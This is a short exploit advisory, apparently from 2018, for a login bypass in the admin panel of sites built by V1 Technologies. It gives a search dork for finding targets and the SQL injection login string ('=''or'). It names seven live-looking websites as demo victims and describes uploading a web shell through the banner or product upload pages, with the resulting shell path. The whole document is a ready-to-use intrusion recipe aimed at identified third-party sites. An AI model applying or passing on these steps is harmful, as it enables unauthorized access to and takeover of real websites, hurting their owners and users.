####################################
# Exploit Title: v1technologies admin page bypass vulnerability
# Date: 2018-09-15
# Vendor Homepage: https://www.v1technologies.com/
# Exploit Author: nothing404.team
# Google Dork: intext:"Mobile Friendly Web Design By: V1 Technologies Ltd"
# Tested on: Kali Linux
####################################
admin page:
site.com/Site-Admin-V1/
exploit:
Username: '=''or'
password: '=''or'
Demo:
http://globalelec.co.in/Site-Admin-V1/
http://www.englishcountrybarn.co.uk/Site-Admin-V1/
http://excellous.biz//Site-Admin-V1/
http://www.indiaelec.com.sg/Site-Admin-V1/
https://www.sportspathwaycoaching.com//Site-Admin-V1/
http://progressivefootballacademy.com/Site-Admin-V1/
http://bossevents.co.in/Site-Admin-V1/
after login go to home -> Banner or Manage Products -> now you can uplaod shell
shell Path --> site.com/images/banner/yourshell.php
####################################
# ! We Are Nothing !
# nothing404.team@gmail.com
####################################